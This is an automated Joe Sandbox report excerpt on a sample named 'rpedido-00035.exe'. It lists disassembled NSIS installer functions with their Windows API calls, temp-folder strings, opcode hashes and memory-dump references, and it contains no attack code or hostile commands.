                                                          • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                          • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                          • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                          • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                          Function 00404BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                          • wsprintfW.USER32 ref: 00404C7A
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                          • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                          • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                          • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                          Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp$C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll
                                                          • API String ID: 3109718747-3098013398
                                                          • Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                          • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                          • Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                          • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                          Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                          • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                          • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                          • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                          Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                          • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                          • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                          • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                          Function 00405C81 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3355392842
                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                          Function 00405D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405D3A
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405DE2
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0), ref: 00405DF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                          • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                          • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                          • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                          Function 00405388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053B7
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                            • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                          • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                          • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                          • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                          Function 0040627E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                          • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                          • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                          • Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                          • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                          Function 00403A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76B72EE0,00403A00,76B73420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                          • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3355392842
                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                          Function 00405CCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405CD3
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405CE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3370423016
                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
